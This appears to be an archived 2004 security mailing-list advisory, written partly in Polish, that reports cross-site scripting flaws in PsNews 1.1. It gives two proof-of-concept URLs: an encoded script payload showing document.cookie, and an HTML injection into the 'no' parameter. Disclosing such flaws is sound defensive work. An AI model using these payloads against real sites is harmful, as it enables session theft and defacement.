<<< Date Index >>>     <<< Thread Index >>>

Bug XSS in PsNews 1.1




°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
*5-9-2004
*Autor: wacky
*E-mail: wacky@xxxxxxxxxxxx
*WWW: http://www.nicponie.org
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
-----------------------------------------------
|B&#322;&#261;d Cross-Site Scripting (XSS) w PsNews 1.1 | 
-----------------------------------------------

Exploit:

a) 
http://[target]/index.php?function=show_all&no=%253cscript>alert%2528document.cookie);%253c/script>

b)
http://[target]/index.php?function=add_kom&no=";>%20<font%20size="20"%20color=red>%20<b>%20WackY%20%20</font>

°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
http://www.nicponie.org/